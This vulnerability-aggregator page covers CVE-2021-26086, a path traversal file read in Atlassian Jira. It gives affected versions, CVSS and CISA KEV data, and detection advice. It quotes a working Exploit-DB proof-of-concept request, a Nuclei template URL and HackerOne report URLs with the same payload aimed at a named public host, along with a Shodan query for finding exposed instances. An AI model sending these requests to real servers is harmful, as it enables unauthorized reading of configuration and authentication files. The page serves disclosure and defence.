CVE-2021-26086
published 2021-08-16CVE-2021-26086: Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the…
PriorityP182medium5.3CVSS 3.1
AVNACLPRNUINSUCLINAN
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2024-12-03
Exploited in the wild
EPSS
100.00%
100.0th percentile
Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. The affected versions are before version 8.5.14, from version 8.6.0 before 8.13.6, and from version 8.14.0 before 8.16.1.
Affected
16 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| atlassian | jira_data_center | < 8.5.14 | 8.5.14 |
| atlassian | jira_data_center | >= 8.14.0 < unspecified | unspecified |
| atlassian | jira_data_center | >= 8.14.0 < 8.16.1 | 8.16.1 |
| atlassian | jira_data_center | >= 8.6.0 < unspecified | unspecified |
| atlassian | jira_data_center | >= 8.6.0 < 8.13.6 | 8.13.6 |
| atlassian | jira_data_center | >= unspecified < 8.5.14 | 8.5.14 |
| atlassian | jira_data_center | >= unspecified < 8.13.6 | 8.13.6 |
| atlassian | jira_data_center | >= unspecified < 8.16.1 | 8.16.1 |
| atlassian | jira_server | < 8.5.14 | 8.5.14 |
| atlassian | jira_server | >= 8.14.0 < unspecified | unspecified |
| atlassian | jira_server | >= 8.14.0 < 8.16.1 | 8.16.1 |
| atlassian | jira_server | >= 8.6.0 < unspecified | unspecified |
| atlassian | jira_server | >= 8.6.0 < 8.13.6 | 8.13.6 |
| atlassian | jira_server | >= unspecified < 8.5.14 | 8.5.14 |
| atlassian | jira_server | >= unspecified < 8.13.6 | 8.13.6 |
| atlassian | jira_server | >= unspecified < 8.16.1 | 8.16.1 |
Detection & IOCsextracted from sources · hover to see the quote
url{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml
- →Detect exploitation attempts by matching HTTP GET requests with the path pattern /s/<token>/_/;/WEB-INF/ — the semicolon (;) before WEB-INF is the path traversal bypass token characteristic of this CVE. ↗
- →Validate exploitation by checking HTTP 200 responses containing the string '<web-app' in the response body, indicating successful WEB-INF/web.xml file read. ↗
- →Monitor for requests targeting /WEB-INF/classes/seraph-config.xml via the traversal pattern, as this file contains authentication configuration and is a high-value target. ↗
- →Shodan queries 'http.component:"Atlassian Jira"' and 'http.component:"atlassian jira"' can be used to identify exposed Jira instances for proactive asset discovery.
- ·Affected versions are before 8.5.14, from 8.6.0 before 8.13.6, and from 8.14.0 before 8.16.1. Instances running 8.16.1+, 8.13.6+, or 8.5.14+ are not vulnerable. ↗
- ·The vulnerability is unauthenticated (PR:N) and network-accessible (AV:N), meaning no credentials are required to exploit it remotely.
- ·This CVE is listed in CISA's Known Exploited Vulnerabilities catalog with a remediation due date of 2024-12-03, indicating active in-the-wild exploitation. ↗
CVSS provenance
nvdv3.15.3MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck5.3MEDIUM
cisa5.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Atlassian Jira Server and Data Center Path Traversal Vulnerability
cisa·2024-11-12·CVSS 5.3
CVE-2021-26086 [MEDIUM] CWE-22 Atlassian Jira Server and Data Center Path Traversal Vulnerability
Vulnerability: Atlassian Jira Server and Data Center Path Traversal Vulnerability
Affected: Atlassian Jira Server and Data Center
Atlassian Jira Server and Data Center contain a path traversal vulnerability that allows a remote attacker to read particular files in the /WEB-INF/web.xml endpoint.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://jira.atlassian.com/browse/JRASERVER-72695 ; https://nvd.nist.gov/vuln/detail/CVE-2021-26086
Remediation Due Date: 2024-12-03
GHSA
GHSA-vvhj-8w7x-qj58: Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /
ghsa_unreviewed·2022-05-24
CVE-2021-26086 [MEDIUM] CWE-22 GHSA-vvhj-8w7x-qj58: Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /
Affected versions of Atlassian Jira Server and Data Center allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint. The affected versions are before version 8.5.14, from version 8.6.0 before 8.13.6, and from version 8.14.0 before 8.16.1.
VulnCheck
Atlassian Jira Server and Data Center Path Traversal Vulnerability
vulncheck·2021·CVSS 5.3
CVE-2021-26086 [MEDIUM] CWE-22 Atlassian Jira Server and Data Center Path Traversal Vulnerability
Atlassian Jira Server and Data Center Path Traversal Vulnerability
Atlassian Jira Server and Data Center contain a path traversal vulnerability that allows a remote attacker to read particular files in the /WEB-INF/web.xml endpoint.
Affected: Atlassian Jira Server and Data Center
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-18&host_type=src&vulnerability=cve-2021-26086; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-22&host_type=src&vulnerability=cve-2021-26086; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-23&host_type=
No detection rules found.
Exploit-DB
Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read
exploitdb·2021-10-06·CVSS 5.3
CVE-2021-26086 [MEDIUM] Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read
Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read
---
# Exploit Title: Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read
# Date: 2021-10-05
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/jira/download/data-center
# Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1
# Tested on: Kali Linux & Windows 10
# CVE : CVE-2021-26086
POC File #1 - web.xml
GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/a
Nuclei
Atlassian Jira Limited - Local File Inclusion
nuclei·CVSS 5.3
CVE-2021-26086 [MEDIUM] Atlassian Jira Limited - Local File Inclusion
Atlassian Jira Limited - Local File Inclusion
Affected versions of Atlassian Jira Limited Server and Data Center are vulnerable to local file inclusion because they allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint.
Template:
id: CVE-2021-26086
info:
name: Atlassian Jira Limited - Local File Inclusion
author: cocxanh
severity: medium
description: Affected versions of Atlassian Jira Limited Server and Data Center are vulnerable to local file inclusion because they allow remote attackers to read particular files via a path traversal vulnerability in the /WEB-INF/web.xml endpoint.
impact: |
This vulnerability can result in unauthorized access to sensitive files and data, as well as potential remote code execution, leading t
Recorded Future
Analyze Recent Atlassian Vulnerabilities and Keep Your Infrastructure Protected
blogs_recorded_future·CVSS 9.6
[CRITICAL] Analyze Recent Atlassian Vulnerabilities and Keep Your Infrastructure Protected
## Analyze Recent Atlassian Vulnerabilities and Keep Your Infrastructure Protected
For years, software solutions built by Atlassian have found their way to nearly every organization's software stack. Tools such as JIRA, Confluence, Bamboo, and BitBucket are often seen playing a crucial role in various departments across enterprises.
From managing projects or handling organization-wide documentation, to hosting the very code of a product being developed by the organization, the constant reliance upon and amount of historical data held within these applications have turned them into a lucrative target for attackers, expanding the attack surface in the process.
## Historical Atlassian Vulnerabilities
Traditionally, vulnerabilities within the Atlassian software stack have originated from d
Recorded Future
Analyze Recent Atlassian Vulnerabilities and Keep Your Infrastructure Protected
blogs_recorded_future·CVSS 9.6
[CRITICAL] Analyze Recent Atlassian Vulnerabilities and Keep Your Infrastructure Protected
# Analyze Recent Atlassian Vulnerabilities and Keep Your Infrastructure Protected
For years, software solutions built by Atlassian have found their way to nearly every organization's software stack. Tools such as JIRA, Confluence, Bamboo, and BitBucket are often seen playing a crucial role in various departments across enterprises.
From managing projects or handling organization-wide documentation, to hosting the very code of a product being developed by the organization, the constant reliance upon and amount of historical data held within these applications have turned them into a lucrative target for attackers, expanding the attack surface in the process.
## Historical Atlassian Vulnerabilities
Traditionally, vulnerabilities within the Atlassian software stack have originated from di
Greynoiseio
Spike in Atlassian Exploitation Attempts: Patching is Crucial
blogs_greynoiseio
Spike in Atlassian Exploitation Attempts: Patching is Crucial
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
HackerOne
Path Traversal CVE-2021-26086 CVE-2021-26085
hackerone·2021-11-05·CVSS 5.3
CVE-2021-26086 [MEDIUM] Path Traversal CVE-2021-26086 CVE-2021-26085
Path Traversal CVE-2021-26086 CVE-2021-26085
These vulnerabilities were found with https://trickest.com https://trickest.io
CVE-2021-26085:
>https://jira.mariadb.org:/s/123cfx/_/;/WEB-INF/web.xml
CVE-2021-26086:
>https://jira.mariadb.org/s/cfx/_/;/WEB-INF/web.xml
Video explanation:
### Node EOF-RAW-DATA:
- Found Jira hosts from various bug bounty programs convert to file
### Node SED-ADD-AT-BEGINNING:
- Append https:// to every line
### Node PASTE-JIRA-PATHS
- Converts Jira paths to file
### Node MEG(tool)
- Requesting URLs and paths from the file
### Node IS-IT-JIRA?
- Checking if the requested URL is Jira
### Node TAKE-JIRA-URLs
- Parsing previous nodes to get raw URLs
### Node CVE-2021-26086
- Converts payloads to a file
### Node CVE-2021-26085
- Converts payloads to a file
http://packetstormsecurity.com/files/164405/Atlassian-Jira-Server-Data-Center-8.4.0-File-Read.htmlhttps://jira.atlassian.com/browse/JRASERVER-72695http://packetstormsecurity.com/files/164405/Atlassian-Jira-Server-Data-Center-8.4.0-File-Read.htmlhttps://jira.atlassian.com/browse/JRASERVER-72695https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-26086
2021-08-16
Published
2024-11-12
Added to CISA KEV
Exploited in the wild